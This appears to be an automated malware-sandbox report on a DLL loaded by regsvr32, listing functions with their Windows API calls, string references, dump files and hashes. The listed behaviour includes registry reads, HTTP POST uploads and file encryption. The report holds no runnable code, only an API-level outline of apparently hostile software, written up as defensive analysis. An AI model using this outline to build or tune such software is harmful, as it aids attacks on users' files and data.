24e5cbf5464cd461da$cbcfa9c911c58c51f737695511215bb3823dfc59389c605881d2d7ee$cc728c2004b83a708c5273fd44bf7b8e9c9c7f3c5d96df9c223e28ad9d$cf90336a761150b3802e1f31358cd1918b7e212e2c585d9c701d63316c8511ee55b7fdc0$d29f33018596af56885209a0391cf43d81722440b5$d315fa9fc315aa9dda68ee749f45228c94e46ab41367bd54ebf16c51a083ce$d3f56f5ee2844541bfa7ff17bffdb2a994041f078a7c5c7ab77ff58c57fd26e156ccd4$d45827653ff249726a79fdbede60cf2697bdfffbb0272833352983$d4f019a4bc1b04ce85451244cdc3825586136d8a443a5fe5050b7c41c972a7$d736c92c5a303cbef4a63cad9585506b98de72303a782bf667b2fd$d7dddef40bcb161fd3eb8d8a7486578f833b970e6cc9bed563d827c2d53612ee$d8cc16f26f32c667e8d27907236797fb8d1349ffffba12199e2d30632f0ef067da57$d9c026900582effe1ebd7cc94fdb8afbaa0241bdd465b86812c3d3$d9cd3e33aaa2d19c56f72ee1550d26c89e367c18db17a25170d39506365a18802b89d4825b8a12ea$dd169041e6045ea695d4b5fba5755d3b9ae90d0a85edd623df71a1$dd862964aa8aca24afcf7450037a2cd58e6d2829e01e9bdd18b2a581$dfdc4db9ab76b794a162ede3efe2737d973f06cf3724fd0dfef965f379e8efd770fb$e0d92630ea5ab7e9169067535c436f1ba418520799a644dfa57670407452780d99326d1c$e1d532db7c6dd3445eb4439561fda38fa61650c6d5dc7a526995b74c49d81ed0$e4f024b0f588a0906eb3fc55ae76938ab70f6cb938f639c5cf1997925d5fa46f$e87ee75d200430eb580caaeb80adad2aafb4272c691f5cdee98b$ec3c4702515cd356c277cc1a46f21024abf2c18eb0882e14b38c215577e99cef$eceff0f615e1c4fb66078a687301ac07ab21a50777fb4ff2fd96795f4d21e8ae$ed4393d9cfcf648c68a8462e5d12462fa59275dc42f8f90716f7df97a5e0$ed45e0772b1e6a7ce3d97cf2cbb14418bf9f183e601b0306b30b1b9c32c6faa3$f1660a456733745a1791021663c647e5b2a6c9edfea891bedd295312$f23225cf1370a957296663bfb53054b1a2f1a007524b8ebcd0cec408c98a89$f5788632833a499e00af6570eb281151b3a24a1cc89bbc4629f1d5$f8cf18dd257b3c5994c79aa0f88dba1abe186ed7b1a6f5df2e$f9007b3c51c4eb71e936ba5887ccef7baae2da94a0059a8e237cb4896dd5555cdc999ae7$f92111aee3dd3eb249b4b6c99da63ac0befa9f7eff4813c2ff0a$f992f1205b6fcce93ceb623c698f7b12be49ccbb898820a6ed7553061df7ef891fff7700$fc56483f3e7d781d805ab9ebfb49a29cbb88b4cfb2$fca149785f396367b46459231b7c6df2b4615c544e191e2bfaefc385ede5df$ff37083708963434836f8f0c252e8680adff9bc9a0451464a4
API String ID: 1162954093-2434349084
Opcode ID: a3a97de673c30ce842b389a006a58d2de34aef8cec0daa8f32a107c186fd641b
Instruction ID: a15bc2b9cc70d4b7527d4588e6e13188aa3172f9c2fa9507c093c1b5d2cd388d
Opcode Fuzzy Hash: a3a97de673c30ce842b389a006a58d2de34aef8cec0daa8f32a107c186fd641b
Instruction Fuzzy Hash: 41B35FA1F05602A6FA00EBE5D455BEC6360BF45784FC81439D91FE67AAEEACB54CC340

Uniqueness

Uniqueness Score: 100.00%

Function 00007FF983D02610, Relevance: 23.0, APIs: 10, Strings: 3, Instructions: 226
registryUNIQUE

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

RegQueryValueExW.KERNELBASE ref: 00007FF983D027A6
RegQueryValueExW.KERNELBASE ref: 00007FF983D0289C
RegCloseKey.KERNELBASE ref: 00007FF983D02945
GetLastError.KERNEL32 ref: 00007FF983D0294D
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF983D02976
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF983D0297C
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF983D02982
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF983D02988
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF983D0298E
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF983D02994

Strings

6946c029658aeafbefbfdd428c47bd03390da2e6f30da83d815be5d22c0ef7918ba6125441, xrefs: 00007FF983D02853
772ccc659ff2577755bb035e0fb604fb3477d5c339a586a186523c12699dfc6f7923868c61d2e1fbc712, xrefs: 00007FF983D0275D
2c92cd0a32f60eb714d48bd63b6ea2027fa2297712a5f90b43da388dc4c5147933d5441942dab0680bac7beea0bc6c0b49af345b1b9ef9215bd308b1e6e1204b02, xrefs: 00007FF983D02651

Memory Dump Source

Source File: 00000013.00000002.526881955.00007FF983D01000.00000040.00020000.sdmp, Offset: 00007FF983D00000, based on PE: true

Associated: 00000013.00000002.526868191.00007FF983D00000.00000002.00020000.sdmp Download File
Associated: 00000013.00000002.527206038.00007FF983D74000.00000040.00020000.sdmp Download File
Associated: 00000013.00000002.527230547.00007FF983D7D000.00000040.00020000.sdmp Download File
Associated: 00000013.00000002.527244840.00007FF983D7E000.00000080.00020000.sdmp Download File
Associated: 00000013.00000002.527295746.00007FF983D80000.00000004.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_7ff983d00000_regsvr32.jbxd

Yara matches

Similarity

API ID: _invalid_parameter_noinfo_noreturn$QueryValue$CloseErrorLast
String ID: 2c92cd0a32f60eb714d48bd63b6ea2027fa2297712a5f90b43da388dc4c5147933d5441942dab0680bac7beea0bc6c0b49af345b1b9ef9215bd308b1e6e1204b02$6946c029658aeafbefbfdd428c47bd03390da2e6f30da83d815be5d22c0ef7918ba6125441$772ccc659ff2577755bb035e0fb604fb3477d5c339a586a186523c12699dfc6f7923868c61d2e1fbc712
API String ID: 213398537-3244201323
Opcode ID: f159dd515d2b4101636660c7e2a6403ad8ceaaba391c5dfb48b10bf237a3c925
Instruction ID: 33125437eb95a3247969d960c831fc28d21d04379ce0cebb064a1f1da0e210c3
Opcode Fuzzy Hash: f159dd515d2b4101636660c7e2a6403ad8ceaaba391c5dfb48b10bf237a3c925
Instruction Fuzzy Hash: 16A1A2B2B15A41D9EB00DFB4D4947AC2361FB44798F845239E65E93AD9DFB8E158C300

Uniqueness

Uniqueness Score: 100.00%

Function 00007FF983D022E0, Relevance: 18.2, APIs: 12, Instructions: 159
processfilesynchronizationUNIQUE

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreatePipe.KERNELBASE ref: 00007FF983D02374
GetStartupInfoW.KERNEL32 ref: 00007FF983D023A8
CreateProcessW.KERNEL32 ref: 00007FF983D0240A
WaitForSingleObject.KERNEL32 ref: 00007FF983D02427
GetFileSize.KERNEL32 ref: 00007FF983D0243F
ReadFile.KERNEL32 ref: 00007FF983D02483
CloseHandle.KERNEL32 ref: 00007FF983D02528
CloseHandle.KERNEL32 ref: 00007FF983D02532
CloseHandle.KERNEL32 ref: 00007FF983D0253D
CloseHandle.KERNEL32 ref: 00007FF983D02548

Memory Dump Source

Source File: 00000013.00000002.526881955.00007FF983D01000.00000040.00020000.sdmp, Offset: 00007FF983D00000, based on PE: true

Associated: 00000013.00000002.526868191.00007FF983D00000.00000002.00020000.sdmp Download File
Associated: 00000013.00000002.527206038.00007FF983D74000.00000040.00020000.sdmp Download File
Associated: 00000013.00000002.527230547.00007FF983D7D000.00000040.00020000.sdmp Download File
Associated: 00000013.00000002.527244840.00007FF983D7E000.00000080.00020000.sdmp Download File
Associated: 00000013.00000002.527295746.00007FF983D80000.00000004.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_7ff983d00000_regsvr32.jbxd

Yara matches

Similarity

API ID: CloseHandle$CreateFile$InfoObjectPipeProcessReadSingleSizeStartupWait
String ID:
API String ID: 1192957364-0
Opcode ID: fc0fa6659517e819dafdf8e600e43bac8332d7090f7d8053019e5a9bd5cd5314
Instruction ID: 112b38b0475246b31f308b2657128e74615cf6db15e2a0d994036fc42ed744b9
Opcode Fuzzy Hash: fc0fa6659517e819dafdf8e600e43bac8332d7090f7d8053019e5a9bd5cd5314
Instruction Fuzzy Hash: A8717372A08B4186E700CFA5E8547AD77A0FB84B88F544239DA4E97B68DFBCE155C700

Uniqueness

Uniqueness Score: 100.00%

Function 00007FF983D29628, Relevance: 15.2, APIs: 10, Instructions: 230
UNIQUE

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

__scrt_dllmain_crt_thread_attach.LIBCMT ref: 00007FF983D29650
__scrt_acquire_startup_lock.LIBCMT ref: 00007FF983D296A2
_RTC_Initialize.LIBCMT ref: 00007FF983D296D0
__scrt_dllmain_after_initialize_c.LIBCMT ref: 00007FF983D296F6
__scrt_release_startup_lock.LIBCMT ref: 00007FF983D29721
__scrt_fastfail.LIBCMT ref: 00007FF983D29787

Memory Dump Source

Source File: 00000013.00000002.526881955.00007FF983D01000.00000040.00020000.sdmp, Offset: 00007FF983D00000, based on PE: true

Associated: 00000013.00000002.526868191.00007FF983D00000.00000002.00020000.sdmp Download File
Associated: 00000013.00000002.527206038.00007FF983D74000.00000040.00020000.sdmp Download File
Associated: 00000013.00000002.527230547.00007FF983D7D000.00000040.00020000.sdmp Download File
Associated: 00000013.00000002.527244840.00007FF983D7E000.00000080.00020000.sdmp Download File
Associated: 00000013.00000002.527295746.00007FF983D80000.00000004.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_7ff983d00000_regsvr32.jbxd

Yara matches

Similarity

API ID: Initialize__scrt_acquire_startup_lock__scrt_dllmain_after_initialize_c__scrt_dllmain_crt_thread_attach__scrt_fastfail__scrt_release_startup_lock
String ID:
API String ID: 2904100720-0
Opcode ID: ecab0114482c2ec688dfa3842c85ecafd53ff866dd27cb4879b756031482de8e
Instruction ID: f5e7a049cefd9448c999a2347435ca0cbd68a0afb23c1ff0a14eacb63f229368
Opcode Fuzzy Hash: ecab0114482c2ec688dfa3842c85ecafd53ff866dd27cb4879b756031482de8e
Instruction Fuzzy Hash: EB818DE1E0864286FA50DBA79441BB96290BF85780F9C403DE94FE7796DEBCF46DC600

Uniqueness

Uniqueness Score: 100.00%

Function 00007FF983D02580, Relevance: 6.0, APIs: 4, Instructions: 35
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetCurrentProcess.KERNEL32 ref: 00007FF983D0259C
OpenProcessToken.ADVAPI32 ref: 00007FF983D025AD
GetTokenInformation.KERNELBASE ref: 00007FF983D025DA
CloseHandle.KERNEL32 ref: 00007FF983D025F1

Memory Dump Source

Source File: 00000013.00000002.526881955.00007FF983D01000.00000040.00020000.sdmp, Offset: 00007FF983D00000, based on PE: true

Associated: 00000013.00000002.526868191.00007FF983D00000.00000002.00020000.sdmp Download File
Associated: 00000013.00000002.527206038.00007FF983D74000.00000040.00020000.sdmp Download File
Associated: 00000013.00000002.527230547.00007FF983D7D000.00000040.00020000.sdmp Download File
Associated: 00000013.00000002.527244840.00007FF983D7E000.00000080.00020000.sdmp Download File
Associated: 00000013.00000002.527295746.00007FF983D80000.00000004.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_7ff983d00000_regsvr32.jbxd

Yara matches

Similarity

API ID: ProcessToken$CloseCurrentHandleInformationOpen
String ID:
API String ID: 215268677-0
Opcode ID: 0019742395aee970d180fa3dd4f0a02abbafaf5f1e0ba7b51a21258ee040976e
Instruction ID: d52e92959efb792a04612e6fd66ae7a6441540c5063455fe2b2114e47470fc8f
Opcode Fuzzy Hash: 0019742395aee970d180fa3dd4f0a02abbafaf5f1e0ba7b51a21258ee040976e
Instruction Fuzzy Hash: 5A0156B1619641C6EB40DFA1F494A6AB3B0FF88B44F845139EA5F97654DF7CE408CB40

Uniqueness

Uniqueness Score: 0.11%

Function 00007FF983D28AEE, Relevance: 3.1, APIs: 2, Instructions: 81
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF983D28C88
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF983D28C8E

Memory Dump Source

Source File: 00000013.00000002.526881955.00007FF983D01000.00000040.00020000.sdmp, Offset: 00007FF983D00000, based on PE: true

Associated: 00000013.00000002.526868191.00007FF983D00000.00000002.00020000.sdmp Download File
Associated: 00000013.00000002.527206038.00007FF983D74000.00000040.00020000.sdmp Download File
Associated: 00000013.00000002.527230547.00007FF983D7D000.00000040.00020000.sdmp Download File
Associated: 00000013.00000002.527244840.00007FF983D7E000.00000080.00020000.sdmp Download File
Associated: 00000013.00000002.527295746.00007FF983D80000.00000004.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_7ff983d00000_regsvr32.jbxd

Yara matches

Similarity

API ID: _invalid_parameter_noinfo_noreturn
String ID:
API String ID: 3668304517-0
Opcode ID: 56d8f0dccdde754d40d0bae3878d9644bd5e5925c4c6d921d62358b75234aed1
Instruction ID: 4b79abc7dedc7df3358e4a58403ef4c44554d77326bdc44f865489261c3c6005
Opcode Fuzzy Hash: 56d8f0dccdde754d40d0bae3878d9644bd5e5925c4c6d921d62358b75234aed1
Instruction Fuzzy Hash: 962173E2B1468184EE11DBBAD44979C2212BB457F4F848239EA3D57BDADEB8F085C200

Uniqueness

Uniqueness Score: 0.11%

Function 00007FF983D495D4, Relevance: 3.1, APIs: 2, Instructions: 74
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetEnvironmentStringsW.KERNEL32 ref: 00007FF983D495ED
FreeEnvironmentStringsW.KERNEL32 ref: 00007FF983D496B1

Memory Dump Source

Source File: 00000013.00000002.526881955.00007FF983D01000.00000040.00020000.sdmp, Offset: 00007FF983D00000, based on PE: true

Associated: 00000013.00000002.526868191.00007FF983D00000.00000002.00020000.sdmp Download File
Associated: 00000013.00000002.527206038.00007FF983D74000.00000040.00020000.sdmp Download File
Associated: 00000013.00000002.527230547.00007FF983D7D000.00000040.00020000.sdmp Download File
Associated: 00000013.00000002.527244840.00007FF983D7E000.00000080.00020000.sdmp Download File
Associated: 00000013.00000002.527295746.00007FF983D80000.00000004.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_7ff983d00000_regsvr32.jbxd

Yara matches

Similarity

API ID: EnvironmentStrings$Free
String ID:
API String ID: 3328510275-0
Opcode ID: 04cbaadb2a6dd25d9b6774af6319fe9db2bfec6af2eb1e02e04f5da83b9a374a
Instruction ID: ea0534b9dbf2a4c260e0892773b4139657da1f509e82857d6685004640f8ef1f
Opcode Fuzzy Hash: 04cbaadb2a6dd25d9b6774af6319fe9db2bfec6af2eb1e02e04f5da83b9a374a
Instruction Fuzzy Hash: A32175A1E1879182EB24DF53A440629A6A4BB94BD0F8C4139DE8FB3B94DF7CF456C700

Uniqueness

Uniqueness Score: 0.05%

Function 00007FF983D43100, Relevance: 3.1, APIs: 2, Instructions: 73
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetStdHandle.KERNEL32 ref: 00007FF983D43179
GetFileType.KERNEL32 ref: 00007FF983D4318F

Memory Dump Source

Source File: 00000013.00000002.526881955.00007FF983D01000.00000040.00020000.sdmp, Offset: 00007FF983D00000, based on PE: true

Associated: 00000013.00000002.526868191.00007FF983D00000.00000002.00020000.sdmp Download File
Associated: 00000013.00000002.527206038.00007FF983D74000.00000040.00020000.sdmp Download File
Associated: 00000013.00000002.527230547.00007FF983D7D000.00000040.00020000.sdmp Download File
Associated: 00000013.00000002.527244840.00007FF983D7E000.00000080.00020000.sdmp Download File
Associated: 00000013.00000002.527295746.00007FF983D80000.00000004.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_7ff983d00000_regsvr32.jbxd

Yara matches

Similarity

API ID: FileHandleType
String ID:
API String ID: 3000768030-0
Opcode ID: e32667abee72717fedd77de28c3136e0f9cd42162783d51f0fbea799472014c0
Instruction ID: f65074ff5a507ac2358e9265a4d8aa2d302083dc2bdc061147ee069cdff11401
Opcode Fuzzy Hash: e32667abee72717fedd77de28c3136e0f9cd42162783d51f0fbea799472014c0
Instruction Fuzzy Hash: 57318262A18A4681DF64CB599450A782651FB45BA0BAC033DD76F973E0CF79F469C380

Uniqueness

Uniqueness Score: 0.43%

Function 00007FF983D41C88, Relevance: 2.6, APIs: 2, Instructions: 59
COMMONLIBRARYCODE

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetLastError.KERNEL32 ref: 00007FF983D41C97
SetLastError.KERNEL32 ref: 00007FF983D41D35

Memory Dump Source

Source File: 00000013.00000002.526881955.00007FF983D01000.00000040.00020000.sdmp, Offset: 00007FF983D00000, based on PE: true

Associated: 00000013.00000002.526868191.00007FF983D00000.00000002.00020000.sdmp Download File
Associated: 00000013.00000002.527206038.00007FF983D74000.00000040.00020000.sdmp Download File
Associated: 00000013.00000002.527230547.00007FF983D7D000.00000040.00020000.sdmp Download File
Associated: 00000013.00000002.527244840.00007FF983D7E000.00000080.00020000.sdmp Download File
Associated: 00000013.00000002.527295746.00007FF983D80000.00000004.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_7ff983d00000_regsvr32.jbxd

Yara matches

Similarity

API ID: ErrorLast
String ID:
API String ID: 1452528299-0
Opcode ID: 4306a561362b304f99fb02ecabc35885cb75a8ebd852e7910a124c3c3cd8dd31
Instruction ID: f1470b30c867da1ceee6bcce60f014f2ef4e013e71e1e71e3cfa4072febd4bef
Opcode Fuzzy Hash: 4306a561362b304f99fb02ecabc35885cb75a8ebd852e7910a124c3c3cd8dd31
Instruction Fuzzy Hash: 7E2150A1E0864241FB55D7E1A942B795161BF847B4F8C5B3CE83FA27D6DEACB409C600

Uniqueness

Uniqueness Score: 0.29%

Function 00007FF983D45A5C, Relevance: 1.5, APIs: 1, Instructions: 47
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

_invalid_parameter_noinfo.LIBCMT ref: 00007FF983D45A87

Memory Dump Source

Source File: 00000013.00000002.526881955.00007FF983D01000.00000040.00020000.sdmp, Offset: 00007FF983D00000, based on PE: true

Associated: 00000013.00000002.526868191.00007FF983D00000.00000002.00020000.sdmp Download File
Associated: 00000013.00000002.527206038.00007FF983D74000.00000040.00020000.sdmp Download File
Associated: 00000013.00000002.527230547.00007FF983D7D000.00000040.00020000.sdmp Download File
Associated: 00000013.00000002.527244840.00007FF983D7E000.00000080.00020000.sdmp Download File
Associated: 00000013.00000002.527295746.00007FF983D80000.00000004.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_7ff983d00000_regsvr32.jbxd

Yara matches

Similarity

API ID: _invalid_parameter_noinfo
String ID:
API String ID: 3215553584-0
Opcode ID: 69c0246e260bdb653590928fd4eed2362b1d82414a1d70ae38570950e5dc5001
Instruction ID: 6e581da73de0e5477e994da857310a4140266d0006cd5b7aa216c46c597ca7a5
Opcode Fuzzy Hash: 69c0246e260bdb653590928fd4eed2362b1d82414a1d70ae38570950e5dc5001
Instruction Fuzzy Hash: F11160B290D74286E310DB94A481A6A63A1FB44744F9D053DE68FE7792EEBCF819C740

Uniqueness

Uniqueness Score: 0.14%

Function 00007FF983D458D8, Relevance: 1.5, APIs: 1, Instructions: 36
memoryCOMMONLIBRARYCODE

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

RtlAllocateHeap.NTDLL ref: 00007FF983D4592D

Memory Dump Source

Source File: 00000013.00000002.526881955.00007FF983D01000.00000040.00020000.sdmp, Offset: 00007FF983D00000, based on PE: true

Associated: 00000013.00000002.526868191.00007FF983D00000.00000002.00020000.sdmp Download File
Associated: 00000013.00000002.527206038.00007FF983D74000.00000040.00020000.sdmp Download File
Associated: 00000013.00000002.527230547.00007FF983D7D000.00000040.00020000.sdmp Download File
Associated: 00000013.00000002.527244840.00007FF983D7E000.00000080.00020000.sdmp Download File
Associated: 00000013.00000002.527295746.00007FF983D80000.00000004.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_7ff983d00000_regsvr32.jbxd

Yara matches

Similarity

API ID: AllocateHeap
String ID:
API String ID: 1279760036-0
Opcode ID: ba3a96c6be64c61bf5b9ffe285a84d2b3357c14f202822a48d9c967e456284f5
Instruction ID: d2752f5e50acef8140870e9490a96d8526dd62cbb11114fb16b8484f64a0d087
Opcode Fuzzy Hash: ba3a96c6be64c61bf5b9ffe285a84d2b3357c14f202822a48d9c967e456284f5
Instruction Fuzzy Hash: 8AF049C5B0960681FF55DAE25461BB512867F88B50FCC543CC90FE62D1ED9CF98EC210

Uniqueness

Uniqueness Score: 0.00%

Function 00007FF983D29AF4, Relevance: 1.5, APIs: 1, Instructions: 23
UNIQUE

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

__scrt_dllmain_crt_thread_attach.LIBCMT ref: 00007FF983D29B16

Memory Dump Source

Source File: 00000013.00000002.526881955.00007FF983D01000.00000040.00020000.sdmp, Offset: 00007FF983D00000, based on PE: true

Associated: 00000013.00000002.526868191.00007FF983D00000.00000002.00020000.sdmp Download File
Associated: 00000013.00000002.527206038.00007FF983D74000.00000040.00020000.sdmp Download File
Associated: 00000013.00000002.527230547.00007FF983D7D000.00000040.00020000.sdmp Download File
Associated: 00000013.00000002.527244840.00007FF983D7E000.00000080.00020000.sdmp Download File
Associated: 00000013.00000002.527295746.00007FF983D80000.00000004.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_7ff983d00000_regsvr32.jbxd

Yara matches

Similarity

API ID: __scrt_dllmain_crt_thread_attach
String ID:
API String ID: 2860701742-0
Opcode ID: 84af8402ecc19af6f2d6efd1b40a71a451edfddafdc168391739db53c4d94e2a
Instruction ID: b484e3fcce4e869cf951fa763206e8aa0f13c7a2df8b1c63402854d294b94628
Opcode Fuzzy Hash: 84af8402ecc19af6f2d6efd1b40a71a451edfddafdc168391739db53c4d94e2a
Instruction Fuzzy Hash: 9EE0C2C0E0E28245FE66A6E21082BB952406F5A310F8C107DE89FE3183CD9D75ADA525

Uniqueness

Uniqueness Score: 100.00%

Function 00007FF983D41D54, Relevance: 1.5, APIs: 1, Instructions: 17
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

__vcrt_uninitialize_ptd.LIBVCRUNTIME ref: 00007FF983D41D7F

Memory Dump Source

Source File: 00000013.00000002.526881955.00007FF983D01000.00000040.00020000.sdmp, Offset: 00007FF983D00000, based on PE: true

Associated: 00000013.00000002.526868191.00007FF983D00000.00000002.00020000.sdmp Download File
Associated: 00000013.00000002.527206038.00007FF983D74000.00000040.00020000.sdmp Download File
Associated: 00000013.00000002.527230547.00007FF983D7D000.00000040.00020000.sdmp Download File
Associated: 00000013.00000002.527244840.00007FF983D7E000.00000080.00020000.sdmp Download File
Associated: 00000013.00000002.527295746.00007FF983D80000.00000004.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_7ff983d00000_regsvr32.jbxd

Yara matches

Similarity

API ID: __vcrt_uninitialize_ptd
String ID:
API String ID: 1180542099-0
Opcode ID: aeea10d26ae1b013042fd9a5f16fd04bb196f066fa89625a96f5ca4e8362b718
Instruction ID: a01db1813bebd855265213921241b20613eb87f4075f5f61e7943343a456ac1f
Opcode Fuzzy Hash: aeea10d26ae1b013042fd9a5f16fd04bb196f066fa89625a96f5ca4e8362b718
Instruction Fuzzy Hash: CBE092D0D4D60290EB68E7E06842BB912507F55360FDC2E3DD02FE15D2EEACB14AD600

Uniqueness

Uniqueness Score: 1.15%

Non-executed Functions

Function 00007FF983D17940, Relevance: 37.1, APIs: 18, Strings: 3, Instructions: 311networkfileUNIQUE

Download Yara Rule

APIs

InternetOpenW.WININET ref: 00007FF983D17A2C
InternetConnectW.WININET ref: 00007FF983D17B12
HttpOpenRequestW.WININET ref: 00007FF983D17B71
HttpSendRequestW.WININET ref: 00007FF983D17BB0
HttpQueryInfoW.WININET ref: 00007FF983D17BFB
InternetReadFile.WININET ref: 00007FF983D17C94
WriteFile.KERNEL32 ref: 00007FF983D17CBE
CloseHandle.KERNEL32 ref: 00007FF983D17CD1
InternetCloseHandle.WININET ref: 00007FF983D17CE8
InternetCloseHandle.WININET ref: 00007FF983D17CF1
InternetCloseHandle.WININET ref: 00007FF983D17CFC
GetLastError.KERNEL32 ref: 00007FF983D17D48

Strings

8817a87579e4dcadedcbc9a460d07dfbc5bd6f7366ee53d109ec1591d95e4adf334b9492cb61e964b843a4306b9bb123c5e478366ff3198044af27f3e35f47eb06, xrefs: 00007FF983D179F1
HTTP/1.1, xrefs: 00007FF983D17B67
POST, xrefs: 00007FF983D179AE

Memory Dump Source

Source File: 00000013.00000002.526881955.00007FF983D01000.00000040.00020000.sdmp, Offset: 00007FF983D00000, based on PE: true

Associated: 00000013.00000002.526868191.00007FF983D00000.00000002.00020000.sdmp Download File
Associated: 00000013.00000002.527206038.00007FF983D74000.00000040.00020000.sdmp Download File
Associated: 00000013.00000002.527230547.00007FF983D7D000.00000040.00020000.sdmp Download File
Associated: 00000013.00000002.527244840.00007FF983D7E000.00000080.00020000.sdmp Download File
Associated: 00000013.00000002.527295746.00007FF983D80000.00000004.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_7ff983d00000_regsvr32.jbxd

Yara matches

Similarity

API ID: Internet$CloseHandle$Http$FileOpenRequest$ConnectErrorInfoLastQueryReadSendWrite
String ID: 8817a87579e4dcadedcbc9a460d07dfbc5bd6f7366ee53d109ec1591d95e4adf334b9492cb61e964b843a4306b9bb123c5e478366ff3198044af27f3e35f47eb06$HTTP/1.1$POST
API String ID: 2464402415-3540460043
Opcode ID: 12c0ef27f6b9c01b3bb8397c6b0b57a35711ebde15956b06f0b8fde79ca46654
Instruction ID: e89a7c3dfe57380d03c07b89a7c82f1d318de41e6ee2df62ac8ce8b1d54890fb
Opcode Fuzzy Hash: 12c0ef27f6b9c01b3bb8397c6b0b57a35711ebde15956b06f0b8fde79ca46654
Instruction Fuzzy Hash: 07D1CAB271868281EA20DF95E454B6EB361FB84794FC44139DA5E97BA9DFBCF048C700

Uniqueness

Uniqueness Score: 100.00%

Function 00007FF983D10B30, Relevance: 31.7, APIs: 16, Strings: 2, Instructions: 246UNIQUE

Download Yara Rule

APIs

GetVolumeInformationW.KERNEL32 ref: 00007FF983D10C10
DeviceIoControl.KERNEL32 ref: 00007FF983D10C81
CloseHandle.KERNEL32 ref: 00007FF983D10C92
GetDriveTypeW.KERNEL32 ref: 00007FF983D10CAA
QueryDosDeviceW.KERNEL32 ref: 00007FF983D10CC4
SetupDiGetClassDevsW.SETUPAPI ref: 00007FF983D10D38
SetupDiEnumDeviceInterfaces.SETUPAPI ref: 00007FF983D10D71
SetupDiGetDeviceInterfaceDetailW.SETUPAPI ref: 00007FF983D10DA0
SetupDiGetDeviceInterfaceDetailW.SETUPAPI ref: 00007FF983D10DF7
DeviceIoControl.KERNEL32 ref: 00007FF983D10E64
CloseHandle.KERNEL32 ref: 00007FF983D10EE4
SetupDiDestroyDeviceInfoList.SETUPAPI ref: 00007FF983D10EED
00007FF9AA922F90.SETUPAPI ref: 00007FF983D10F02

Strings

USB\, xrefs: 00007FF983D10F28
\Floppy, xrefs: 00007FF983D10CD2

Memory Dump Source

Source File: 00000013.00000002.526881955.00007FF983D01000.00000040.00020000.sdmp, Offset: 00007FF983D00000, based on PE: true

Associated: 00000013.00000002.526868191.00007FF983D00000.00000002.00020000.sdmp Download File
Associated: 00000013.00000002.527206038.00007FF983D74000.00000040.00020000.sdmp Download File
Associated: 00000013.00000002.527230547.00007FF983D7D000.00000040.00020000.sdmp Download File
Associated: 00000013.00000002.527244840.00007FF983D7E000.00000080.00020000.sdmp Download File
Associated: 00000013.00000002.527295746.00007FF983D80000.00000004.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_7ff983d00000_regsvr32.jbxd

Yara matches

Similarity

API ID: Device$Setup$CloseControlDetailHandleInterface$00007A922ClassDestroyDevsDriveEnumInfoInformationInterfacesListQueryTypeVolume
String ID: USB\$\Floppy
API String ID: 1516414671-497063568
Opcode ID: 70505352b08a9f918e3a3ad35f537230caff135ce23aa4ca6b87e56227af6aaa
Instruction ID: d5da92164396759e8abf88f359c1bf33e340adfa796cd28c1b36570a1595eb66
Opcode Fuzzy Hash: 70505352b08a9f918e3a3ad35f537230caff135ce23aa4ca6b87e56227af6aaa
Instruction Fuzzy Hash: 59C19572A1874186E720DFA5E840BAD77A0FB48754F884139DA5EA3F94EF7CE549CB00

Uniqueness

Uniqueness Score: 100.00%

Function 00007FF983D089D0, Relevance: 31.7, APIs: 15, Strings: 3, Instructions: 192encryptionUNIQUE

Download Yara Rule

APIs

CryptAcquireContextW.ADVAPI32 ref: 00007FF983D08A63
CryptGenRandom.ADVAPI32 ref: 00007FF983D08A7E
CryptCreateHash.ADVAPI32 ref: 00007FF983D08AA6
CryptHashData.ADVAPI32 ref: 00007FF983D08AC5
CryptDeriveKey.ADVAPI32 ref: 00007FF983D08AEE
CryptAcquireContextW.ADVAPI32 ref: 00007FF983D08B17
CryptImportKey.ADVAPI32 ref: 00007FF983D08B3E
CryptEncrypt.ADVAPI32 ref: 00007FF983D08B70
CryptReleaseContext.ADVAPI32 ref: 00007FF983D08B7D
_fread_nolock.LIBCMT ref: 00007FF983D08C37
CryptEncrypt.ADVAPI32 ref: 00007FF983D08C77
CryptDestroyKey.ADVAPI32 ref: 00007FF983D08CC0
CryptDestroyKey.ADVAPI32 ref: 00007FF983D08CCA
CryptDestroyHash.ADVAPI32 ref: 00007FF983D08CD5
